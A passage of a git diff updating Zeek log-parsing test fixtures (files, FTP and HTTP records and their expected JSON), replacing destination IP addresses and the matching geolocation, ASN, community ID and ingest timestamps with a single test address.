"{\"ts\":1617069792.519193,\"fuid\":\"FSMkdM3YUSoEVpLZN4\",\"tx_hosts\":[\"169.254.169.254\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CgbPEj2jf5Ca7Lw0x2\"],\"source\":\"HTTP\",\"depth\":0,\"analyzers\":[\"SHA1\",\"MD5\"],\"mime_type\":\"text/html\",\"duration\":0.00005316734313964844,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1609,\"total_bytes\":1609,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"1ab1d3a926a99ccfc25acccc5b4289b4\",\"sha1\":\"1895628784b47ad8da112c699a1b21f5b49c2b80\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -525,7 +525,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:03:13.669Z", "file": { @@ -546,7 +546,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -558,7 +558,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -584,8 +584,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826818800Z", - "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753376300Z", + "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C0vua63rzjtLaiefyj", @@ -602,7 +602,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "log": { "file": { @@ -616,7 +616,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -657,7 +657,7 @@ "8e8321ca08b08e3726fe1d82996884eeb5f0d655" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, @@ -668,8 +668,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826822600Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", + "ingested": "2021-12-09T13:51:00.753381700Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", diff --git a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json index afb2a004543..80ed77ec353 100644 --- a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json +++ b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json @@ -51,7 +51,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615408300Z", + "ingested": "2021-12-09T13:51:01.440342Z", "original": "{\"ts\":1187379104.955342,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"EPSV\",\"reply_code\":229,\"reply_msg\":\"Entering Extended Passive Mode (|||37100|)\",\"data_channel.passive\":true,\"data_channel.orig_h\":\"192.168.1.182\",\"data_channel.resp_h\":\"192.168.1.231\",\"data_channel.resp_p\":37100}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -119,7 +119,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615419200Z", + "ingested": "2021-12-09T13:51:01.440350900Z", "original": "{\"ts\":1187379105.01948,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"RETR\",\"arg\":\"ftp://192.168.1.231/resume.doc\",\"file_size\":39424,\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -184,7 +184,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615424800Z", + "ingested": "2021-12-09T13:51:01.440355400Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -257,7 +257,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:27.615432500Z", + "ingested": "2021-12-09T13:51:01.440358800Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log index 8183a7443d7..8f44674919d 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log @@ -1,8 +1,8 @@ -{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} -{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"23.55.163.58","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"52.53.69.85","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]} -{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/http.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"89.160.20.156","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} +{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]} +{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/http.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json index ed0877afaa9..9a21b7521e5 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json @@ -3,26 +3,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Jose", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -121.8914, - "lat": 37.3388 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6185, + "number": 29518, "organization": { - "name": "Apple Inc." + "name": "Bredband2 AB" } }, - "address": "17.253.5.203", + "address": "89.160.20.156", "port": 80, - "ip": "17.253.5.203" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -53,7 +53,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dtBPRfpKEZyg1iOHss95buwv+cw=", + "community_id": "1:TXs3dhUTv+gqBJnP8SIFZaOWpyM=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:05:30.172Z", @@ -66,7 +66,7 @@ ], "ip": [ "10.178.98.102", - "17.253.5.203" + "89.160.20.156" ] }, "http": { @@ -85,8 +85,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259576900Z", - "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"17.253.5.203\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993412400Z", + "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"89.160.20.156\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", @@ -116,26 +116,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "34.206.130.40", + "address": "89.160.20.156", "port": 80, - "ip": "34.206.130.40" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -165,7 +165,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "community_id": "1:61UpXAOHdoCqwl0IE7pv7Zrqgig=", "transport": "tcp" }, "@timestamp": "2019-01-17T06:36:59.757Z", @@ -175,7 +175,7 @@ "related": { "ip": [ "10.20.8.197", - "34.206.130.40" + "89.160.20.156" ] }, "http": { @@ -194,8 +194,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259587100Z", - "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", + "ingested": "2021-12-09T13:51:01.993421500Z", + "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", @@ -223,23 +223,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.58", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.58" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -264,7 +267,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6EkQLym56b7e/6iC17geVW5hAWc=", + "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:15:54.277Z", @@ -274,7 +277,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.58" + "89.160.20.156" ] }, "http": { @@ -292,8 +295,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259593200Z", - "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"23.55.163.58\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993427600Z", + "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CdqHhA1AsxBIjmVZ9", @@ -312,26 +315,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Jose", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -121.8914, - "lat": 37.3388 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.53.69.85", + "address": "89.160.20.156", "port": 80, - "ip": "52.53.69.85" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -356,7 +359,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DCTMm9iJ3zprWF+EMbM+Kzz2G/g=", + "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:15:55.599Z", @@ -366,7 +369,7 @@ "related": { "ip": [ "10.156.0.2", - "52.53.69.85" + "89.160.20.156" ] }, "http": { @@ -384,8 +387,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259599Z", - "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"52.53.69.85\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", + "ingested": "2021-12-09T13:51:01.993433500Z", + "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CxhRTwkHNRsHxBw34", @@ -404,23 +407,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -445,7 +451,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:341n70GKTc+se6UT8lXgjnHVXXo=", + "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:00.171Z", @@ -455,7 +461,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { @@ -473,8 +479,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259605600Z", - "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993439400Z", + "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", 